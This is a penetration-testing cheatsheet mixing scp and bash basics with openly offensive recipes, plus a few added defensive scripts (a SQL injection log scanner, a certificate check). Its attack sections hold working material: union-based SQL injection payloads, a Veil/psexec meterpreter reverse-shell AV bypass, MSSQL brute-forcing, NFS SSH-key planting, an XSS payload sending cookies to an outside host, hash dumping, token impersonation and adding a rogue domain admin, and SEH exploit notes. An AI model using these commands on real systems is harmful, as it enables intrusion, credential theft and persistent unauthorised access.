CheatSheet (Short)


[+] Secure Copy (scp) Cheatsheet
[>] Copy remote file to local host:
$ scp <user>@<host>:<remote_file> /some/local/directory
[>] Copy local file to remote host:
$ scp <local_file> <user>@<host>:/some/remote/directory
[>] Copy local directory to remote directory:
$ scp -r <local_dir> <user>@<host>:/some/remote/directory/<remote_dir>
[>] Copy a file from one remote host to another:
$ scp <user>@<host1>:/some/remote/directory/foobar.txt <user>@<host2>:/some/remote/directory/
[>] Improve scp performance (use blowfish):
$ scp -c blowfish <local_file> <user>@<host>:/some/remote/directory
Note: the blowfish cipher was removed from OpenSSH in 7.6, so -c blowfish is rejected by current clients and servers. Pick a cipher both ends list under ssh -Q cipher; the AES-GCM and ChaCha20 ciphers are faster than the old CBC modes on modern CPUs anyway.

SQL Injection

[+] Union Based SQL Injection
' or 1=1#
1' ORDER BY 10#
1' UNION SELECT version(),2#
1' UNION SELECT version(),database()#
1' UNION SELECT version(),user()#
1' UNION ALL SELECT table_name,2 from information_schema.tables#
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#
1' UNION ALL SELECT concat(user,char(58),password),2 from users#
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
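From the defender's side, the payloads above leave a recognisable trace in web-server logs. The following is an added example, not part of the original cheatsheet: a POSIX shell/awk scanner that URL-decodes each query value (the payloads arrive percent-encoded) and flags union-style signatures. The sample log lines, rule names and regexes are assumptions constructed for this demo.

```shell
#!/bin/sh
# Constructed sample access-log lines (not from the original page): the query
# strings carry the union-based payloads from the list above, plus benign hits.
SAMPLE_LOG='10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /login?user=alice HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /login?user=%27%20or%201%3D1%23 HTTP/1.1" 200 9001
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=1%27%20UNION%20SELECT%20version%28%29%2Cdatabase%28%29%23 HTTP/1.1" 200 777
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item?id=1%27%20UNION%20ALL%20SELECT%20table_name%2C2%20from%20information_schema.tables%23 HTTP/1.1" 200 4000
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search?q=union+jack HTTP/1.1" 200 300'

# Reads combined-format log lines on stdin and prints "ip path rule[,rule]" for
# every request whose decoded query values match a signature. Pure POSIX awk,
# so it does not rely on bash-only printf escapes and also runs under dash.
sqli_scan() {
    awk '
    BEGIN {
        for (i = 32; i < 127; i++) hex[sprintf("%02x", i)] = sprintf("%c", i)
        nrules = split("tautology union-select schema-enum trailing-comment", name, " ")
        rx["tautology"]        = "\047 *or +[0-9]+ *= *[0-9]+"      # quote, or 1=1
        rx["union-select"]     = "union( +all)? +select"
        rx["schema-enum"]      = "information_schema\\.(tables|columns)"
        rx["trailing-comment"] = "(#|-- |/\\*) *$"                  # MySQL comment terminators
    }
    function urldecode(s,   out) {             # "+" -> space, %XX -> printable byte
        gsub(/\+/, " ", s); out = ""
        while (match(s, /%[0-9A-Fa-f][0-9A-Fa-f]/)) {
            out = out substr(s, 1, RSTART - 1) hex[tolower(substr(s, RSTART + 1, 2))]
            s = substr(s, RSTART + 3)
        }
        return out s
    }
    {
        split($0, q, "\"")                     # q[2] = GET /path?query HTTP/1.1
        split(q[2], req, " ")
        qpos = index(req[2], "?")
        if (qpos == 0) next                    # no query string, nothing to inspect
        path = substr(req[2], 1, qpos - 1)
        n = split(substr(req[2], qpos + 1), kv, "&")
        for (i = 1; i <= n; i++) {
            v = tolower(urldecode(substr(kv[i], index(kv[i], "=") + 1)))
            hits = ""
            for (j = 1; j <= nrules; j++) if (v ~ rx[name[j]]) hits = hits (hits == "" ? "" : ",") name[j]
            if (hits != "") print $1, path, hits
        }
    }'
}

printf '%s\n' "$SAMPLE_LOG" | sqli_scan
```

The benign "union jack" search is not reported because the rule requires both UNION and SELECT; tune the regexes to the application before alerting on them.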

AV bypass

1. Generate an executable using Veil.
2. In msfconsole set up psexec with the relevant payload (windows/meterpreter/reverse_tcp):
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST ip
RHOST => ip
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit

Apache SSL

# Enabling a self-signed certificate on a local website
1. Install OpenSSL
sudo apt-get install openssl
2. Run the following command to generate the self-signed certificate and its private key (-nodes writes the key unencrypted, so keep it under /etc/ssl/private, which is readable by root only):
sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key
3. Enable the SSL module for Apache
sudo a2enmod ssl
4. Make the default-ssl site available by creating a symbolic link into sites-enabled
sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf
5. Edit the file default-ssl.conf
sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf
Change the following lines to point to the certificate and key:
SSLCertificateFile /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key
6. Restart Apache
sudo /etc/init.d/apache2 restart
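A check worth running before the restart in step 6, added here and not part of the original cheatsheet: it confirms that the certificate and key Apache is pointed at actually belong together and are not close to expiry. The demo function generates a throwaway pair in a temporary directory with the same openssl command as step 2 (with -subj added so it does not prompt); the function names and exit codes are assumptions.

```shell
#!/bin/sh
# Verify that a certificate and private key match and that the certificate is
# valid for at least min_days more days. Defaults are the paths from the steps above.
check_cert_pair() {
    crt="${1:-/etc/ssl/certs/server.crt}"
    key="${2:-/etc/ssl/private/server.key}"
    min_days="${3:-30}"
    # Unreadable or malformed file: exit 1
    crt_mod=$(openssl x509 -noout -modulus -in "$crt" 2>/dev/null) || return 1
    key_mod=$(openssl rsa -noout -modulus -in "$key" 2>/dev/null) || return 1
    # A cert and key that do not share a modulus were not generated together: exit 2
    [ "$crt_mod" = "$key_mod" ] || return 2
    # -checkend fails when the cert expires within the given number of seconds: exit 3
    openssl x509 -noout -checkend $((min_days * 86400)) -in "$crt" >/dev/null || return 3
    return 0
}

# Self-contained demonstration: a freshly generated pair passes, an unrelated
# key against the same certificate is rejected with exit code 2.
demo() {
    tmp=$(mktemp -d)
    openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -subj "/CN=localhost" \
        -out "$tmp/server.crt" -keyout "$tmp/server.key" 2>/dev/null
    openssl genrsa -out "$tmp/other.key" 2048 2>/dev/null
    rc_ok=0;  check_cert_pair "$tmp/server.crt" "$tmp/server.key" 30 || rc_ok=$?
    rc_bad=0; check_cert_pair "$tmp/server.crt" "$tmp/other.key" 30 || rc_bad=$?
    rm -rf "$tmp"
    echo "matching pair: $rc_ok (expect 0), foreign key: $rc_bad (expect 2)"
    [ "$rc_ok" -eq 0 ] && [ "$rc_bad" -eq 2 ]
}

demo
```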

Attacking MS-SQL

[+] Attacking MSSQL with Metasploit
[>] Enumerate MSSQL Servers on the network:
msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info ip ip
Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio.
[>] Bruteforce MSSQL Database:
msf > use auxiliary/scanner/mssql/mssql_login
[>] Enumerate MSSQL Database:
msf > use auxiliary/admin/mssql/mssql_enum
[>] Gain shell using gathered credentials
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Bash Scripting

Simple Bash Scripting Cheatsheet
[+] nano Shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of text.
ctrl x Exit editor.
[+] Create a text file:
touch file Creates an empty file.
ifconfig > tmp Redirect the output of a command into a file (overwrites it).
nano file
[+] Create a file and append text to it:
ifconfig > tmp
echo >> tmp Append an empty line (>> appends, > overwrites).
ping -c3 <host> >> tmp
[+] How to view a file:
cat file Show entire contents of file.
more file Show one page at a time. Space bar for next page and (q) to exit.
head file Show the first 10 lines.
head -15 file Show the first 15 lines.
tail file Show the last 10 lines.
tail -15 file Show the last 15 lines.
tail -f file Useful when viewing the output of a log file.
[+] pipe
cat tmp | grep Bcast Feeds the output of one process to the input of another process.
[+] Processes
ps aux Show all running process for all users.
kill -9 PID Forcibly kill a PID (SIGKILL cannot be caught); plain kill PID sends SIGTERM first, which lets the process clean up.
[+] Word Count
wc -l tmp2 Count the number of lines in a file
[+] cut
-d delimiter
-f fields
[+] sort
sort -u file Sort and drop duplicate lines.
sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n Sort IP addresses correctly (each octet compared as a number).
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP address (the text between the parentheses).
[+] awk
awk '{print $1}' file Show the 1st column.
awk '{print $1,$5}' file Show the 1st and 5th columns.
[+] grep
grep -v 'red' file Show only lines that do not contain a single string (red).
[+] egrep -v
egrep -v '(red|white|blue)' file Show only lines that contain none of several strings.
[+] sed
sed 's/FOO/BAR/g' file Replace FOO with BAR.
sed 's/FOO//g' file Replace FOO with nothing.
sed '/^FOO/d' file Remove lines that start with FOO.
[+] colour
31=red 32=green 33=yellow 34=blue 35=magenta 36=cyan
echo -e "\e[1;34mThis is a blue text.\e[0m"
Bash Scripts
[+] Simple bash script:
#!/bin/bash
echo "Hello world."
[+] Make a file executable.
chmod +x file
chmod 755 file
[+] Variables
name="Alice"     # assignment: no spaces around the = sign
user=$(whoami)
echo "$name"
echo "$user"
echo "Hello $name. You are running as $user."
echo "Hello World"
ip=$(ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1)   # relies on the legacy ifconfig output format
echo "Hello $name. Your IP address is: $ip"
[+] User Input
read -p "Domain: " domain
echo "Please input your domain:"
read -p "Domain:" domain
ping -c 5 "$domain"
[+] Check For No User Input
if [ -z "$domain" ]; then
    echo "#########################"
    echo "Invalid choice."
    exit 1
fi
[+] For loops
for host in $(cat hosts.txt); do
    command "$host"
done
[+] One Liners
Port Scan:
for port in $(cat Ports.txt); do nc -nzv ip $port & sleep 0.5; done
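The cut/sort one-liner, the empty-input check and the for loop above, combined into one runnable script. This is an added example, not from the original cheatsheet; the ping-style sample lines and the function names are assumptions, and the address check goes a little beyond the -z test by also rejecting values that are not a dotted quad before they reach a command.

```shell
#!/bin/sh
# Constructed sample input (not from the page): host (address) lines of the
# kind the cut '(' / cut ')' one-liner is aimed at, with a duplicate and
# addresses that plain text sort would order wrongly (9. after 192.).
SAMPLE='Pinging web01 (10.0.0.20) with 32 bytes of data
Pinging db01 (9.0.0.1) with 32 bytes of data
Pinging web01 (10.0.0.20) with 32 bytes of data
Pinging app02 (10.0.0.3) with 32 bytes of data
Pinging proxy (192.168.1.100) with 32 bytes of data'

# The cut pipeline from the cheatsheet plus its octet-aware sort: isolate the
# text between the first "(" and ")", sort each dotted field numerically and
# drop duplicates. LC_ALL=C keeps the ordering independent of the locale.
extract_ips() {
    cut -d '(' -f2 | cut -d ')' -f1 |
        LC_ALL=C sort -u -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
}

# The "Check For No User Input" test, generalised: reject an empty value and
# anything that is not four dot-separated numbers (a coarse sanity check).
require_ip() {
    if [ -z "$1" ]; then
        echo "Invalid choice: no address given." >&2; return 1
    fi
    case "$1" in
        *[!0-9.]* | .* | *. | *..*) echo "Invalid choice: $1" >&2; return 1 ;;
    esac
    octets=$(printf '%s\n' "$1" | tr '.' '\n' | wc -l)
    [ $octets -eq 4 ] || { echo "Invalid choice: $1" >&2; return 1; }
    return 0
}

# The for-loop pattern, reading the extracted addresses and validating each
# one before it is handed on. Prints "checked <ip>" instead of running ping.
check_hosts() {
    printf '%s\n' "$SAMPLE" | extract_ips | while IFS= read -r host; do
        require_ip "$host" && echo "checked $host"
    done
}

check_hosts
```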


CTF Notes
# Enumerate Users via Finger
# Show nfs shares available
showmount -e ip
# Use nfspysh to mount the share and create a .ssh directory
nfspysh -o server=ip:/home/user
mkdir .ssh
cd .ssh
# Generate ssh key pair
cp /tmp/authorized_keys
# Transfer attacker public key to host
put /tmp/authorized_keys
# Login to SSH server with no password
SSH_AUTH_SOCK=0 ssh <user>@<ip>

Cookie Stealing

[+] Cookie Stealing:
[-] Start Web Service
python -m SimpleHTTPServer 80
[-] Use one of the following XSS payloads:
<script>new Image().src="http://ip/index.php?c="+document.cookie;</script>

Domain Admin Exploitation

[+] After compromising a Windows machine:
[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain
[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/smb/smb_enumusers_domain
msf > set smbuser Administrator
msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf > set rhosts ip/24
msf > set threads 8
msf > run
msf > spool off
[>] Compromise Admin's box
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token MYDOM\\administrator
meterpreter > getuid
meterpreter > shell
C:\> whoami
C:\> net user hacker /add /domain
C:\> net group "Domain Admins" hacker /add /domain


Exploit Development Cheatsheet
[+] Fuzzing:
import socket

# Build buffers of increasing length: 50, 100, ... up to 1000 bytes of "A"
buffer = ["A"]
counter = 50
while counter <= 1000:   # the original compared len(buffer), the list length, which is not the buffer size
    buffer.append("A" * counter)
    counter = counter + 50

for buffstring in buffer:
    print("Fuzzing: " + str(len(buffstring)))
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("", 5555))   # host left blank on the original page; the snippet stops after connecting
    sock.close()
[+] Bad Character Testing:
[+] Structured Exception Handler (SEH) Exploitation notes
- Crash the application
- Check SEH overwrite (view the SEH chain)
- Find offset (!mona pattern_create <length>)
- Find certain SEH references to the cyclic pattern (!mona findmsp)
- Verify offset to NSEH (Next Exception)
- Find POP/POP/RET address with mona (!mona seh -cpb <bad chars>)
- Add a short jump into the payload to jump over the SEH ("\xeb\x06" + 2 bytes of padding)
- Add shellcode to the payload
- Ensure existing padding to make sure the crash still happens.